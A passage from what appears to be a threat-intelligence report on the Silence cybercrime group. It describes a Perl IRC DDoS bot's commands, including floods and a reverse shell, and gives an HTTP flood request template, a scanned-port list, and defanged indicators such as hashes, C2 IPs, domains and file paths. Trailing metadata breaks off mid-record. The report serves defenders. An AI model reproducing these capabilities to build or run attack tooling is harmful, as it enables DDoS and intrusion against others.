intention was to have these random values written to the\r\nbeginning of the file so as to obstruct restoration of RAdmin connections logs. An\r\nimplementation error, however, prevents this from happening:\r\nThe argument FILE_END is thereby passed on to the function SetFilePointer, which\r\nmeans that the write pointer is set to the end of the file.\r\nPerl IRC DDoS bot\r\nThis bot is a Perl script designed to run on Linux OS. Its functionality includes\r\nretrieving information about the infected machine, executing shell commands\r\n(cmd), sending emails, downloading files, scanning ports and carrying out DDoS\r\nattacks. The server involved is 91.134.146[.]175:1984, communication protocol IRC,\r\nchannel name \"#PMA\".\n\n77\r\nFirst of all, the script displays the message \"Irc Script Running!\\n\", after which the\r\nbot randomly selects its own version from among the following lines:\r\n\"VERSION — unknown command.\"\r\n\"mIRC v5.91 K.Mardam-Bey\"\r\n\"mIRC v6.2 Khaled Mardam-Bey\"\r\n\"mIRC v6.03 Khaled Mardam-Bey\"\r\n\"mIRC v6.14 Khaled Mardam-Bey\"\r\n\"mIRC v6.15 Khaled Mardam-Bey\"\r\n\"mIRC v6.16 Khaled Mardam-Bey\"\r\n\"mIRC v6.17 Khaled Mardam-Bey\"\r\n\"mIRC v6.21 Khaled Mardam-Bey\"\r\n\"mIRC v6.31 Khaled Mardam-Bey\"\r\n\"mIRC v7.15 Khaled Mardam-Bey\"\r\nIt uses IRC server 91.134.146[.]175 and port 1984. The server can be changed\r\nby sending the script an address as a parameter at the time of running the\r\nscript. After connection and authorization on the server, the script can receive\r\ncommands from and send execution results to the operator using its nickname.\r\nReceiving the command, the script checks if the message belongs to a particular\r\ninstance (checking is done across internal script parameters) and parses and\r\nexecutes the following commands:\r\n• PPING – receives the thread as a parameter which it then sends out as PONG\r\n\u003c%string%\u003e\r\n• PRIVMSG – contains a list of advanced commands. The command is executed\r\nonly after the script has checked a command for affiliation. For that purpose,\r\nthe server sends out (as parameters) the name of the infected system, the user\r\nname on the infected system and the values specific to a specific version of the\r\nscript.\r\n• NICK – changes the current script nickname (used during a check if a command\r\nis associated with a specific script instance).\r\n• 433 – the bot sends a message to the server: \"\u003c%current nick%\u003e-\u003c%random\r\nvalue from 0 to 999%\u003e\".\r\n• 001 – join the channel and send the message \"[PMA Bot]9,1I’m PMA!\" to the\r\nchannel\r\nA list of extended commands:\r\nCommand Description\r\nVERSION Send the current version of the bot to the server.\r\nhelp Brief bot man\r\nsystem Retrieve information about the current bot instance\r\nversion Receive a bot version\r\nflood Bot man for DDoS\r\nchannel Man for general bot commands\n\nSilence\r\nMoving into the darkside\r\n78\r\nutils Bot man for apps\r\ndie Terminate bot operation\r\njoin Join the channel received as a parameter\r\npart Leave the channel received as a parameter\r\nportscan Get a list of open TCP ports on the device whose ip address is received\r\nas a parameter.\r\ndownload Download and save file\r\ndns Send to server the IP address whose URL is received as a parameter.\r\nport Check if the TCP port is open on a specific device. IP and port are\r\nreceived as parameters.\r\nudp1 Launch a UDP flood attack, packet length 64 to 1024 bytes (small\r\npackets). The address, port, and attack duration are received as\r\nparameters.\r\nudp2 Launch a DDoS attack using all network protocols, and primarily IGMP,\r\nUDP, ICMP, TCP. Attacks all ports starting from 1 ending with the last one\r\nif the time set as a parameter is running. Received as a parameter: the\r\naddress of the victim, the length of the message sent, and the duration\r\nof the attack. Each UDP port is attacked twice.\r\nudp3 Launch an UDP DDoS attack using long packets, receiving the address,\r\nthe port, and the duration of the attack as parameters.\r\ntcp Launch a TCP DDoS attack. Opens 1,000 connections on a specific\r\nport. The address, port, and the duration of the attack are received as\r\na parameter. This command’s man indicates that 4 parameters must\r\nbe transmitted in the sequence: \"\u003cip \u003e \u003cport \u003e \u003cpack size \u003e \u003ctime\u003e\";\r\nthis, however, is an error as the parameter\" \u003cpack size\u003e\" is missing\r\naltogether: the script does not send any messages to the victim.\r\nhttp Launch an Http DDoS attack. Parameters received include the address\r\nof the victim and the duration of the attack. The application sends\r\na message of the following type: \"GET / Http/1.1\\r\\nAccept: */*\\r\\\r\nnHost: \u003c%Victim URL%\u003e\\r\\nConnection: Keep-Alive\\r\\n\\r\\n\" to the\r\nvictim’s address.\r\ncback Open a TCP connection with a remote host to execute shell commands\r\n(or cmd commands in the case of Windows).\r\nmail Send the message. The body of the message:\r\ncontent-type: text/html Subject: \u003c%first parmeter%\u003e\r\nFrom: \u003c%second parmeter%\u003e\r\nTo: \u003c%third parmeter%\u003e\r\n\u003c%forth parameter%\u003e\r\nTo send the message, it uses the utility \"/usr/sbin/sendmail\" with the\r\nparameter –t.\n\n79\r\nctcpflood\r\n(version\r\nwith one\r\nparameter)\r\nThe bot sends the user with the nickname (the first parameter) the\r\nfollowing messages:\r\n\"\\001VERSION\\001\\n\"\r\n\"\\001PING\\001\\n\"\r\n 10 times.\r\nmsgflood Sends the user (whose name it receives as a parameter) a message\r\nwith non-printable characters.\r\nnoticeflood Similar to the \"msgflood\" command, but another IRC command is used\r\nfor transmission.\r\nmaxiflood Carries out the attack launched in ctcpflood, msgflood and noticeflood\r\n5 times.\r\nrejoin Reconnect to the channel.\r\nop Add operator status by nickname. Status and nickname are received as\r\nparameters.\r\ndeop Delete operator status by nickname. Status and nickname are received\r\nas parameters.\r\nvoice Add voice status by nickname. Status and nickname are received as\r\nparameters.\r\ndevoice Delete voice status by nickname. Status and nickname are received as\r\nparameters.\r\nmsg Send a message (the second parameter) to the user whose nickname is\r\nreceived as the first parameter.\r\nflood Send messages (the third parameter) to the user whose nickname\r\nis received as the second parameter. Number of messages: the first\r\nparameter.\r\nctcp The bot sends the user with the nickname [VK8] (the first parameter)\r\nthe following message: \"\\001\u003c%param2%\u003e\\001\".\r\nctcpflood\r\n(version\r\nwith two\r\nparameters)\r\nThe bot sends the user with the nickname [VK9] (the second\r\nparameter) the following messages: \"\\001\u003c%param3%\u003e\\001\". The\r\nnumber of messages is received as a parameter.\r\ninvite Invite the user to the channel. The user and channel are received as\r\nparameters.\r\nnewerver Change the IRC server. The new nickname and address are received as a\r\nparameter; standard port 6667.\r\nnick Change the nickname. The new nickname is received as a parameter.\r\nraw Sends to the server a message that is received as a parameter.\r\neval Run a module that is received as a parameter.\r\nquit Terminate app operation\n\nSilence\r\nMoving into the darkside\r\n80\r\nA list of scanned TCP ports:\r\n1,7,9,14,20,21,22,23,25,53,80,88,110,112,113,137,143,145,222,333,405,443,444,445,512,587,6\r\n16,666,993,995,1024,1025,1080,1144,1156,1222,1230,1337,1348,1628,1641,1720,1723,1763,19\r\n83,1984,1985,1987,1988,1990,1994,2005,2020,2121,2200,2222,2223,2345,2360,2500,2727\r\n,3130,3128,3137,3129,3303,3306,3333,3389,4000,4001,4471,4877,5252,5522,5553,5554,5\r\n642,5777,5800,5801,5900,5901,6062,6550,6522,6600,6622,6662,6665,6666,6667,6969,7\r\n000,7979,8008,8080,8081,8082,8181,8246,8443,8520,8787,8855,8880,8989,9855,9865,\r\n9997,9999,10000,10001,10010,10222,11170,11306,11444,12241,12312,14534,14568,15951,172\r\n72,19635,19906,19900,20000,21412,21443,21205,22022,30999,31336,31337,32768,33180,\r\n35651,36666,37998,41114,41215,44544,45055,45555,45678,51114,51247,51234,55066,5555\r\n5,65114,65156,65120,65410,65500,65501,65523,65533\n\n81\r\nINDICATORS\r\nHashes\r\n14863087695d0f4b40f480fd18d061a4 — Atmosphere.Dropper\r\n4107f2756edb33af1f79b1dce3d2fd77 — Atmosphere.Dropper\r\n6743f474e3a6a02bc1ccc5373e5ebbfa — Atmosphere.Dropper\r\ncefd39402d7f91d8cf5f1cd6ecbf0681 — Atmosphere.Dropper\r\nf69c35969745ae1b60403868e085062e — Atmosphere.Dropper\r\n1ee9f88cc7867e021a818dff012bdf9e — Atmosphere.Injector\r\nb3abb10cc8f4cbb454992b95064a9006 — Atmosphere.Injector\r\n79e61313febe5c67d168cfc3c88cd743 — Atmosphere.Payload\r\n86ea1f46df745a30577f02fc24e266ff — Atmosphere.Payload\r\nc49e6854c79043b624d07da20dd4c7ad — Atmosphere.Payload\r\nc8d0ccd2e58c1c467ee8b138c8a15eec — Atmosphere.Payload\r\nd81ae5e0680d09c118a1705762b0bfce — Atmosphere.Payload\r\nddb276dbfbce7a9e19feecc2c453733d — Atmosphere.Payload\r\n874e94cb3f076a21d3fb9da6eb541bab — CVE-2017-0199\r\n9b9757975d33c9c01b2d3de95d737202 — CVE-2017-0199\r\n00b470090cc3cdb30128c9460d9441f8 — CVE-2017-0262\r\n104913aa3bd6d06677c622dfd45b6c6d — CVE-2017-0262\r\n3be61ecba597022dc2dbec4efeb57608 — CVE-2017-0262\r\n4c1bc95dd648d9b4d1363da2bad0e172 — CVE-2017-0262\r\n57f51443a8d6b8882b0c6afbd368e40e — CVE-2017-0262\r\n5df8067a6fcb6c45c3b5c14adb944806 — CVE-2017-0262\r\n68e190efe7a5c6f1b88f866fc1dc5b88 — CVE-2017-0262\r\n98c5c33f5c0bd07ac3e24935edab202a — CVE-2017-0262\r\n9c7e70f0369215004403b1b289111099 — CVE-2017-0262\r\nc43f1716d6dbb243f0b8cd92944a04bd — CVE-2017-0262\r\ncfc0b41a7cde01333f10d48e9997d293 — CVE-2017-0262\r\ned74331131da5ac4e8b8a1c818373031 — CVE-2017-0262\r\nc3a70d2bf53f2eb6d05cafbb5e640855 — CVE-2017-11882 CVE-2018-\r\n0802\r\nd565500ebee6109edba0be7dea86bf72 — CVE-2018-8174\r\n081ee959cbe6bc7dde7a6d13168e4fb4 — DDoS Perl IrcBot\r\nee650c800d2eedd471ed59aa9435e55f — DDoS Perl IrcBot\r\naa9c31883b3d8e493efad2f983908be3 — DDoS Perl IrcBot\r\n40228a3ea22e61a0f53644881cd59281 — Farse/Mimikatz\r\n9596e59ea38350bc181ce56ffa7d6453 — FTP\r\n15d097a50718f2e7251433ea65401588 — HTA Script\r\n7b6345708e8d40254ab6fed6d124cc6d — HTA Script\r\n2ad83e13b2a36b398a8632ef6ce5aa07 — js-loader\r\n0074d8c3183e2b62b85a2b9f71d4ccd8 — kikothac\r\n440b21958ad0e51795796d3c1a72f7b3 — kikothac\r\n9628d7ce2dd26c188e04378d10fb8ef3 — kikothac\r\nb7f97100748857eb75a6558e608b55df — kikothac\r\ndfddcbcc3b15034ae733c858cb4e587b — LNK Downloader\r\ndd74fcfa1a985beeb972022e3a722589 — Silence MainModule\r\n3345dde0c827dcbda993f7216a8d7c12 — Silence.Downloader\r\n404d69c8b74d375522b9afe90072a1f4 — Silence.Downloader\r\n43eda1810677afe6791dd7a33eb3d83c — Silence.Downloader\n\nSilence\r\nMoving into the darkside\r\n82\r\n5b4417521c71cc89cd3b2fe94ab395b2 — Silence.Downloader\r\n7d3614df9409da3933637f09587af28c — Silence.Downloader\r\n7d8af1f6cf7d08c0c39e03033585d404 — Silence.Downloader\r\n97599e2edc7e7025d5c2a7d7a81dac47 — Silence.Downloader\r\n9b037ead562c789620a167af85d32f72 — Silence.Downloader\r\na1e210598820cbb08e269b2dfd96e741 — Silence.Downloader\r\na58a830dce460e91217328bdefb25cbe — Silence.Downloader\r\nb09b8be361cd0e30a70cc4603a31d1ee — Silence.Downloader\r\nb4313151019b2091cbd27c8810e5c7c5 — Silence.Downloader\r\nc6c84da4f27103db4ff593f4d4f45d95 — Silence.Downloader\r\nef0fb10c602e3ee81e3677c83a44b409 — Silence.Downloader\r\n8a9d278b473b6c5625d57739714702fc — Silence.Cleaner\r\na3de4a1e5b66d96183ad42800d6be862 — Silence.MainModule\r\nb43f65492f2f374c86998bd8ed39bfdd — Silence.MainModule\r\nc4f18d40b17e506f42f72b8ff111a614 — Silence.MainModule\r\ncfffc5a0e5bdc87ab11b75ec8a6715a4 — Silence.MainModule\r\nf1954b7034582da44d3f6a160f0a9322 — Silence.MainModule\r\n121c7a3f139b1cc3d0bf62d951bbe5cb — Silence.ProxyBot\r\n88cb1babb591381054001a7a588f7a28 — Silence.ProxyBot\r\na6771cafd7114df25ac0ef2688722fdf — Silence.ProxyBot\r\na6cb04fad56f1fe5b8f60fabf2f64005 — Silence.ProxyBot\r\ndc4ac53350cc4b30839db19d8d6f3b5f — Silence.ProxyBot\r\n50565c4b80f41d2e7eb989cd24082aab — Silence.ProxyBot.Net\r\n8191dae4bdeda349bda38fd5791cb66f — Silence.ProxyBot.Net\r\n242b471bae5ef9b4de8019781e553b85 — Silence.SurviellanceModule\r\nd7491ed06a7f19a2983774fd50d65fb2 — Silence.SurviellanceModule\r\n1648437368e662fbe4805a1f95aa9fd0 — Smoke\r\ndde658eb388512ee9f4f31f0f027a7df — CHM\r\nE-mails\r\nSenders:\r\ninfo@finamnews019[.]xyz\r\ndriley123@bellsouth[.]net\r\nbelov@ppfbank[.]ru\r\nbelov@vivacity[.]ru\r\ncap@jabber[.]sg\r\ncjlove143@ymail[.]com\r\ndriley123@bellsouth[.]net\r\niambrunk@sbcglobal[.]net\r\njosueruvalcaba@mail[.]com\r\npakovelli@mail[.]com\r\npayonline@fbank[.]org\r\nprokopenkovg@bankci[.]ru\r\nrevamped702@att[.]net\n\n83\r\nsleof@fpbank[.]ru\r\nsvetlana@fcbank[.]ru\r\ntouqirkhan@mail[.]com\r\nyu_chernyshova@mail[.]com\r\nIPs\r\nIP Provider Country Program Year\r\n46.183.221[.]89 DataClub S.A. Latvia Silence.ProxyBot 2016-07\r\nKikothac\r\n87.98.227[.]83 OVH Spain Silence.ProxyBot 2016-08\r\n5.39.30[.]110 OVH France Silence.Downloader 2016-09\r\n46.183.221[.]37 DataClub S.A. Latvia Silence 2016-11\r\n54.36.191[.]97 OVH France Silence.Downloader 2017-10\r\n139.99.156[.]100 OVH France Exploit 2017-10\r\n185.161.208[.]61 DeltaHost Ukraine Silence.ProxyBot 2017-07\r\n2018-02\r\nSilence\r\nSilence.ProxyBot.\r\nNET\r\n185.20.184[.]29 DeltaHost Ukraine Silence 2017-07\r\nMeterpreter\r\nsecure2048[.]at\r\n137.74.224[.]142 OVH France Silence.Downloader 2017-08\r\n149.56.131[.]140 OVH France Meterpreter 2017-08\r\n2017-10\r\n158.69.218[.]119 OVH Canada Silence.Downloader 2017-08\r\n5.188.231[.]89 MoreneHost\r\nSinaro.host\r\nThe\r\nNetherlands\r\nUnknown 2017-10\r\n185.29.10[.]117 DataClub S.A. Sweden Silence.ProxyBot 2017-09\r\nSilence.Downloader\n\nSilence\r\nMoving into the darkside\r\n84\r\n91.207.7[.]86 MaxiDed Poland Silence.Downloader 2018-04\r\n91.207.7[.]79 MaxiDed Poland Silence.Downloader 2018-04\r\nJS downloader 2017-10\r\n5.154.191[.]105 Stephost Moldavia exploit 2018-04\r\n144.217.14[.]173 OVH Canada Exploit CVE-2017-\r\n0199\r\n2017-04\r\n144.217.162[.]168 OVH Canada Silence.Downloader 2017-06\r\n164.132.228[.]29 OVH France Silence.Downloader 2017-06\r\n185.29.11[.]126 DataClub S.A. The\r\nNetherlands\r\nKikothac 2017-12\r\n193.169.245[.]89 DeltaHost The\r\nNetherlands\r\nKikothac 2016-08\r\n51.255.200[.]161 OVH France Exploit CVE-2017-\r\n0199\r\n2017-06\r\n91.243.80[.]200 MoreneHost The\r\nNetherlands\r\nExploit CVE-2017-\r\n11882 + CVE-2018-\r\n0802\r\n2018-05\r\n92.222.68[.]32 OVH France Silence.Downloader 2017-04\r\nUndernet DDoS bot 2017-09\r\n5.8.88[.]254 MoreneHost The\r\nNetherlands\r\nSilence.Downloader 2018-05\r\n109.13.212[.]72 SFR SA France pakovelli@mail[.]\r\ncom\r\n2017-08\r\n194.58.97[.]95 Reg.Ru Russia hacked\r\nfinamnews019[.]xyz\r\n2017-10\r\n46.170.125[.]222 Poland yu_chernyshova@\r\nmail[.]com\r\n2017-08\r\n62.57.131[.]114 Spain touqirkhan@mail[.]\r\ncom\r\n2017-08\r\n77.246.145[.]202 E-PLANET Russia hacked vivacity[.]ru 2017-08\r\n91.207.7[.]97 Poland LNK downloader 2017-06\r\nJS downloader 2017-10\r\nira.pubcs16[.]ro\r\n91.134.146[.]175\r\nOVH Ireland Undernet DDoS bot 2017-09\n\n85\r\nIP Real bank Provider Country Date\r\n5.200.55[.]198 bankrab[.]ru OOO IT-Grad Russia 07-2016\r\n185.7.30[.]137 itbank[.]ru VMLAB LLC VPS\r\nCustomers\r\nRussia 06-2017\r\nDomains\r\nDomain Date\r\ntvaudio[.]ru 07-2016\r\nvivacity[.]ru 08-2017\r\nfinamnews019[.]xyz 10-2017\r\nDomain IP Provider Country Date\r\ntrustintbank[.]org 109.234.34[.]35 VDSINA VDS\r\nHosting\r\nRussia 2016-07\r\nitbank[.]us 193.0.178[.]12 PE Viktor Tyurin The\r\nNetherlands\r\n2016-07\r\nitrbank[.]ru 31.31.204[.]161 Reg.Ru Russia 2016-09\r\nitmbank[.]ru 185.100.67[.]129 Hoster.KZ Kazakhstan 2016-09\r\nitmbank[.]us 46.30.43[.]83 Eurobyte VPS Russia 2016-09\r\nmosfinbank[.]ru 5.200.56[.]161 OOO IT-Grad 2016-09\r\nmostbbank[.]ru 31.31.204[.]161 Reg.Ru Russia 2016-09\r\n77.246.145[.]86 E-PLANET Russia 2017-06\r\n77.246.145[.]82 2017-06\r\nppfbank[.]ru 185.158.154[.]147 IT-GRAD 1Cloud\r\nLLC\r\nRussia 2017-06\r\nfbank[.]org 185.158.154[.]17 IT-GRAD 1Cloud\r\nLLC\r\nRussia 2017-06\r\n185.154.53[.]132 2017-06\r\ndgbank[.]ru 158.255.0[.]35 Mir Telematiki\r\nLtd\r\nRussia 2017-09\r\nbankci[.]ru 95.142.39[.]5 Eurobyte VDS Russia 2017-09\r\n95.142.39[.]6 Eurobyte VDS Russia 2017-09\r\ncsbank[.]ru 185.180.231[.]63 FirstByte Russia 2017-09\n\nSilence\r\nMoving into the darkside\r\n86\r\nfcbank[.]ru 195.161.41[.]2 Avguro\r\nTechnologies\r\nLtd. Hosting\r\nservice provider\r\nRussia 2017-09\r\n81.177.135[.]99 2017-10\r\nmmibank[.]ru 81.177.140[.]58 Avguro\r\nTechnologies\r\nLtd. Hosting\r\nservice provider\r\nRussia 2017-09\r\n81.177.6[.]226 2017-10\r\nspas-ibosberbank[.]ru185.235.130[.]69 ON-LINE DATA\r\nLTD\r\nThe\r\nNetherlands\r\n2018-01\r\nfpbank[.]ru 217.28.213[.]250 INTRELL-NET Russia 2018-05\r\n217.28.213[.]162 2018-05\r\n217.29.57[.]176 2018-05\r\nDomain IP Program Year\r\nvariiform[.]gdn 91.207.7[.]97 Smoke 2017-10\r\ncassocial[.]gdn\r\nsecure2048[.]at 185.20.184[.]29 Meterpreter 2017-07\r\nFile system artifacts\r\nDirectories\r\n• c:\\1\r\n• c:\\intel\r\n• c:\\atm\r\nFiles:\r\n• C:\\Users\\\u003c%username%\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\r\nPrograms\\Startup\\WINWORD.exe\r\n• C:\\ProgramData\\IntelSofts_\u003chex value\u003e.exe\r\n• C:\\ProgramData\\MicrosoftsUpdte.exe\r\n• C:/Windows/temp/OBDP952.tmp.exe\r\n• apcs.exe\r\n• netsrvc32.exe\r\n• smmsrv.exe\r\n• MicrosoftsUpdte_\u003chex value\u003e.exe\r\n• Intel Security.exe\r\n• pripr.exe\n\n93", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://go.group-ib.com/report-silence-en?_gl=1*d1bh3a*_ga*MTIwMzM5Mzc5MS4xNjk4OTI5NzY4*_ga_QMES53K3Y2*MTcwNDcyMjU2OS40LjEuMTcwNDcyMzU1Mi41My4wLjA." ], "report_names": [ "report-silence-en?_gl=1*d1bh3a*_ga*MTIwMzM5Mzc5MS4xNjk4OTI5NzY4*_ga_QMES53K3Y2*MTcwNDcyMjU2OS40LjEuMTcwNDcyMzU1Mi41My4wLjA." ], "threat_actors": [ { "id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0", "created_at": "2022-10-25T15:50:23.710403Z", "updated_at": "2026-04-29T10:39:54.681518Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "Whisper Spider" ], "source_name": "MITRE:Silence", "tools": [ "Winexe", "SDelete" ], "source_id": "MITRE", "reports": null }, { "id": "c9617bb6-45c8-495e-9759-2177e61a8e91", "created_at": "2022-10-25T15:50:23.405039Z", "updated_at": "2026-04-29T10:39:54.841601Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Carbanak", "Anunak" ], "source_name": "MITRE:Carbanak", "tools": [ "Carbanak", "Mimikatz", "PsExec", "netsh" ], "source_id": "MITRE", "reports": null }, { "id": "a58aedbc-e89f-4e0c-8147-c6406a616cfa", "created_at": "2022-10-25T16:07:23.494355Z", "updated_at": "2026-04-29T10:39:55.236385Z", "deleted_at": null, "main_name": "Corkow", "aliases": [ "Corkow", "Metel" ], "source_name": "ETDA:Corkow", "tools": [ "Corkow", "Metel" ], "source_id": "ETDA", "reports": null }, { "id": "746214d4-5d48-4644-b763-8e9a9c549c04", "created_at": "2022-10-25T16:07:23.878029Z", "updated_at": "2026-04-29T10:39:55.375826Z", "deleted_at": null, "main_name": "MoneyTaker", "aliases": [], "source_name": "ETDA:MoneyTaker", "tools": [ "Kronos", "Metasploit", "MoneyTaker", "Screenshotter" ], "source_id": "ETDA", "reports": null }, { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-29T10:39:54.783938Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "01d569b1-f089-4a8f-8396-85078b93da26", "created_at": "2023-01-06T13:46:38.411615Z", "updated_at": "2026-04-29T10:39:53.06001Z", "deleted_at": null, "main_name": "BuhTrap", "aliases": [], "source_name": "MISPGALAXY:BuhTrap", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3b046db2-f60e-49ae-8e16-0cf82a4be6fb", "created_at": "2022-10-25T16:07:23.427162Z", "updated_at": "2026-04-29T10:39:55.209295Z", "deleted_at": null, "main_name": "Buhtrap", "aliases": [ "Buhtrap", "Operation TwoBee", "Ratopak Spider", "UAC-0008" ], "source_name": "ETDA:Buhtrap", "tools": [ "AmmyyRAT", "Buhtrap", "CottonCastle", "FlawedAmmyy", "NSIS", "Niteris EK", "Nullsoft Scriptable Install System", "Ratopak" ], "source_id": "ETDA", "reports": null }, { "id": "e8ebcbda-e8df-4a38-a2a6-63b2608ee6f3", "created_at": "2023-01-06T13:46:38.88051Z", "updated_at": "2026-04-29T10:39:53.191507Z", "deleted_at": null, "main_name": "Silence group", "aliases": [ "WHISPER SPIDER" ], "source_name": "MISPGALAXY:Silence group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf", "created_at": "2023-01-06T13:46:38.405479Z", "updated_at": "2026-04-29T10:39:53.057916Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "Carbon Spider", "CARBON SPIDER", "ATK32", "Coreid", "JokerStash", "GOLD NIAGARA", "G0046", "G0008", "Carbanak", "Sangria Tempest", "ELBRUS" ], "source_name": "MISPGALAXY:FIN7", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ed3810b7-141a-4ed0-8a01-6a972b80458d", "created_at": "2022-10-25T16:07:23.443259Z", "updated_at": "2026-04-29T10:39:55.215377Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Anunak", "Carbanak", "Carbon Spider", "ELBRUS", "G0008", "Gold Waterfall", "Sangria Tempest" ], "source_name": "ETDA:Carbanak", "tools": [ "AVE_MARIA", "Agentemis", "AmmyyRAT", "Antak", "Anunak", "Ave Maria", "AveMariaRAT", "BABYMETAL", "BIRDDOG", "Backdoor Batel", "Batel", "Bateleur", "BlackMatter", "Boostwrite", "Cain \u0026 Abel", "Carbanak", "Cl0p", "Cobalt Strike", "CobaltStrike", "DNSMessenger", "DNSRat", "DNSbot", "DRIFTPIN", "DarkSide", "FOXGRABBER", "FlawedAmmyy", "HALFBAKED", "JS Flash", "KLRD", "MBR Eraser", "Mimikatz", "Nadrac", "Odinaff", "POWERPIPE", "POWERSOURCE", "PsExec", "SQLRAT", "Sekur", "Sekur RAT", "SocksBot", "SoftPerfect Network Scanner", "Spy.Agent.ORM", "TEXTMATE", "TeamViewer", "TiniMet", "TinyMet", "Toshliph", "VB Flash", "WARPRISM", "avemaria", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-29T10:39:54.613086Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7", "created_at": "2025-03-29T02:05:20.764715Z", "updated_at": "2026-04-29T10:39:54.831475Z", "deleted_at": null, "main_name": "GOLD WYMAN", "aliases": [ "Silence " ], "source_name": "Secureworks:GOLD WYMAN", "tools": [ "Silence" ], "source_id": "Secureworks", "reports": null }, { "id": "e5364c16-eb97-467e-a8c2-a720269498c1", "created_at": "2023-01-06T13:46:38.733469Z", "updated_at": "2026-04-29T10:39:53.152419Z", "deleted_at": null, "main_name": "MoneyTaker", "aliases": [], "source_name": "MISPGALAXY:MoneyTaker", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-29T10:39:53.053551Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "FANCY BEAR", "ITG05", "T-APT-12", "UAC-0001", "Fancy Bear", "STRONTIUM", "Group 74", "G0007", "Fighting Ursa", "Blue Athena", "FROZENLAKE", "Forest Blizzard", "GruesomeLarch", "Pawn Storm", "Sednit", "SNAKEMACKEREL", "TG-4127", "SIG40", "ATK5", "APT-C-20", "Sofacy", "Tsar Team", "IRON TWILIGHT", "Grizzly Steppe", "TA422", "UAC-0028", "BlueDelta" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "88e53203-891a-46f8-9ced-81d874a271c4", "created_at": "2022-10-25T16:07:24.191982Z", "updated_at": "2026-04-29T10:39:55.519335Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "ATK 86", "Contract Crew", "G0091", "TAG-CR8", "TEMP.TruthTeller", "Whisper Spider" ], "source_name": "ETDA:Silence", "tools": [ "EDA", "EmpireDNSAgent", "Farse", "Ivoke", "Kikothac", "LOLBAS", "LOLBins", "Living off the Land", "Meterpreter", "ProxyBot", "ReconModule", "Silence.Downloader", "TiniMet", "TinyMet", "TrueBot", "xfs-disp.exe" ], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-29T10:39:54.568619Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-29T10:39:54.685688Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "LAMEHUG", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-29T10:39:55.531334Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": 